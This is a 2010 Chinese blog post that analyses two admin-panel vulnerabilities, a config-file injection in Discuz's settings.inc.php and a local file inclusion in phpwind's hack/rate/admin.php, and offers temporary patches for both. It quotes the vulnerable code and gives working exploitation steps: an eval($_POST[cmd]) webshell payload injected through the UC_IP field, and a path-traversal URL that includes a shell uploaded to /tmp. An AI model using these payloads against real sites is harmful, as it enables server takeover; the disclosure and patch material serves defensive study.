discuz和phpwind的漏洞

| |
[不指定 2010/09/03 00:27 | by 刘新修 ]

多人有了,流传出来了,然后发出来。现在的漏洞,如果主动公布的,肯定是“无鸡肋不公布”,否则肯定是藏着,除非别人公布了。DZ的鸡肋在于需要创建者的权限(创建者的密码一般比较难搞),pw的鸡肋在于需要截断(或者linux旁注写一个shell到tmp下)。

一、discuz后台settings.inc.php中写shell漏洞:

PHP代码
        
  1. if($operation == 'uc' && is_writeable('./config.inc.php') && $isfounder) {   
  2.     
  3.          $ucdbpassnew = $settingsnew['uc']['dbpass'] == '********' ? UC_DBPW : $settingsnew['uc']['dbpass'];   
  4.     
  5.          if($settingsnew['uc']['connect']) {   
  6.     
  7.              $uc_dblink = @mysql_connect($settingsnew['uc']['dbhost'], $settingsnew['uc']['dbuser'], $ucdbpassnew, 1);   
  8.     
  9.              if(!$uc_dblink) {   
  10.     
  11.                  cpmsg('uc_database_connect_error''''error');   
  12.     
  13.              } else {   
  14.     
  15.                  mysql_close($uc_dblink);   
  16.     
  17.              }   
  18.     
  19.          }   
  20.     
  21.   
  22.     
  23.          $fp = fopen('./config.inc.php''r');   
  24.     
  25.          $configfile = fread($fpfilesize('./config.inc.php'));   
  26.     
  27.          $configfile = trim($configfile);   
  28.     
  29.          $configfile = substr($configfile, -2) == '?>' ? substr($configfile, 0, -2) : $configfile;   
  30.     
  31.          fclose($fp);   
  32.     
  33.   
  34.     
  35.          $connect = '';   
  36.     
  37.          if($settingsnew['uc']['connect']) {   
  38.     
  39.              require './config.inc.php';   
  40.     
  41.              $connect = 'mysql';   
  42.     
  43.              $samelink = ($dbhost == $settingsnew['uc']['dbhost'] && $dbuser == $settingsnew['uc']['dbuser'] && $dbpw == $ucdbpassnew);   
  44.     
  45.              $samecharset = !($dbcharset == 'gbk' && UC_DBCHARSET == 'latin1' || $dbcharset == 'latin1' && UC_DBCHARSET == 'gbk');   
  46.     
  47.              $configfile = insertconfig($configfile"/define\('UC_DBHOST',\s*'.*?'\);/i""define('UC_DBHOST', '".$settingsnew['uc']['dbhost']."');");//正则表示从'到')中的被替换,而')可以被任意提交,from oldjun.com   
  48.     
  49.              $configfile = insertconfig($configfile"/define\('UC_DBUSER',\s*'.*?'\);/i""define('UC_DBUSER', '".$settingsnew['uc']['dbuser']."');");   
  50.     
  51.              $configfile = insertconfig($configfile"/define\('UC_DBPW',\s*'.*?'\);/i""define('UC_DBPW', '".$ucdbpassnew."');");   
  52.     
  53.              $configfile = insertconfig($configfile"/define\('UC_DBNAME',\s*'.*?'\);/i""define('UC_DBNAME', '".$settingsnew['uc']['dbname']."');");   
  54.     
  55.              $configfile = insertconfig($configfile"/define\('UC_DBTABLEPRE',\s*'.*?'\);/i""define('UC_DBTABLEPRE', '`".$settingsnew['uc']['dbname'].'`.'.$settingsnew['uc']['dbtablepre']."');");   
  56.     
  57.              //$configfile = insertconfig($configfile, "/define\('UC_LINK',\s*'?.*?'?\);/i", "define('UC_LINK', ".($samelink && $samecharset ? 'TRUE' : 'FALSE').");");   
  58.     
  59.          }   
  60.     
  61.          $configfile = insertconfig($configfile"/define\('UC_CONNECT',\s*'.*?'\);/i""define('UC_CONNECT', '$connect');");   
  62.     
  63.          $configfile = insertconfig($configfile"/define\('UC_KEY',\s*'.*?'\);/i""define('UC_KEY', '".$settingsnew['uc']['key']."');");   
  64.     
  65.          $configfile = insertconfig($configfile"/define\('UC_API',\s*'.*?'\);/i""define('UC_API', '".$settingsnew['uc']['api']."');");   
  66.     
  67.          $configfile = insertconfig($configfile"/define\('UC_IP',\s*'.*?'\);/i""define('UC_IP', '".$settingsnew['uc']['ip']."');");   
  68.     
  69.          $configfile = insertconfig($configfile"/define\('UC_APPID',\s*'?.*?'?\);/i""define('UC_APPID', '".$settingsnew['uc']['appid']."');");   
  70.     
  71.   
  72.     
  73.          $fp = fopen('./config.inc.php', 'w');  
  74.     
  75.          if(!($fp = @fopen('./config.inc.php', 'w'))) {  
  76.     
  77.              cpmsg('uc_config_write_error', '', 'error');   
  78.     
  79.          }   
  80.     
  81.          @fwrite($fp, trim($configfile));   
  82.     
  83.          @fclose($fp);   
  84.     
  85.      }    
  86.     
  87.   

漏洞详情:

settings.inc.php对提交的数据缺乏有效过滤,导致可以写入')污染配置文件的数据,而insertconfig函数的则匹配无法正确匹配到最后,导致可以经过2次输入可以成功绕过daddslashes把shell写进配置文件。

PHP代码
        
  1. function insertconfig($s$find$replace) {   
  2.     
  3. if(preg_match($find$s)) {   
  4.     
  5. $s = preg_replace($find$replace$s);//正则匹配替换数据   
  6.     
  7. else {   
  8.     
  9. $s .= "\r\n".$replace;   
  10.     
  11. }   
  12.     
  13. return $s;   
  14.     
  15. }   

漏洞测试:

步骤一:UC_IP(UC_IP是可选项,随便写入一般不影响程序运行)中写入污染数据:xxx');eval($_POST[cmd])?>提交;
步骤二:UC_IP随便输入aaa,正则匹配只匹配到了'),于是自动把分号前的闭合了。

临时补丁:

在if($operation == 'uc' && is_writeable('./config.inc.php') && $isfounder) {下添加:

PHP代码
        
  1. foreach($settingsnew['uc'as $key => $value){   
  2.     
  3. $settingsnew['uc'][$key]=str_replace(')','',$value);   
  4.     
  5. }  

二、phpwind后台本地包含漏洞:

漏洞详情:

文件:hack\rate\admin.php
源码:

PHP代码
        
  1. <?php   
  2.     
  3. !function_exists('readover') && exit('Forbidden');   
  4.     
  5. define ( "H_R", R_P . "hack/rate/" );   
  6.     
  7. define ( "L_R", R_P . "lib/" );   
  8.     
  9. InitGP ( array ('ajax' ) );   
  10.     
  11. $action = strtolower ( ($job) ? $job : "admin" );   
  12.     
  13. $filepath = H_R . "action/" . $action . "Action.php";   
  14.     
  15.   
  16.     
  17. (! file_exists ( $filepath )) && exit ();   
  18.     
  19.   
  20.     
  21. if ($job != "ajax") {   
  22.     
  23.      require H_R . '/template/layout.php';   
  24.     
  25. else {   
  26.     
  27.      require_once $filepath;   
  28.     
  29. }   
  30.     
  31.   
  32.     
  33. ?>    
  34.     
  35.   

$job可以自定义,触发本地包含,只不过addslashes了,因此不能通过%00截断;但可以通过若干///////截断,或者直接在tmp文件夹下写个shell来包含。具体不多说了,利用办法:

漏洞测试:

先在tmp下上传一个shell,名为Action.php
然后访问:http://127.0.0.1/pw/admin.php?adminjob=hack&hackset=rate&typeid=100&job=../../../../../../tmp/

临时补丁:

PHP代码
        
  1. $filepath = H_R . "action/" . $action . "Action.php";  

替换为:

PHP代码
        
  1. $filepath = Pcv(H_R . "action/" . $action . "Action.php");  

 

Tags: ,
H5/JS/CSS | 评论(0) | 引用(0) | 阅读(4226)